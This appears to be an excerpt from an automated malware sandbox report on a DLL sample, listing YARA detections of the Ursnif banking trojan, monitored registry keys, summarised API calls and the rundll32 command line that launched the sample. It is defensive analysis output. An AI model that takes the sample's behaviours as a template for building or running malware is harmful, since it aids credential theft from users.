Source: Yara match | File source: 00000005.00000003.294762520.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.286919905.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.285453583.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.3.loaddll32.exe.1678d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.3058d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.6dd30000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.loaddll32.exe.6dd30000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.3f58d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4d58d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353493626.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353527674.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353601646.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353567176.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352699094.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352816951.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352743659.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353611757.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352664971.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352761373.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353343104.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5752, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, | 4_2_033D4E9C
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD31F31 LoadLibraryA,GetProcAddress, | 1_2_6DD31F31
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD7BFB5 mov eax, dword ptr fs:[00000030h] | 1_2_6DD7BFB5
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD7BAF2 push dword ptr fs:[00000030h] | 1_2_6DD7BAF2
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD7BEEB mov eax, dword ptr fs:[00000030h] | 1_2_6DD7BEEB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6DD7BFB5 mov eax, dword ptr fs:[00000030h] | 4_2_6DD7BFB5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6DD7BAF2 push dword ptr fs:[00000030h] | 4_2_6DD7BAF2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6DD7BEEB mov eax, dword ptr fs:[00000030h] | 4_2_6DD7BEEB
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\block.dll',#1
Source: loaddll32.exe, 00000001.00000002.504472454.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.504863861.00000000035F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd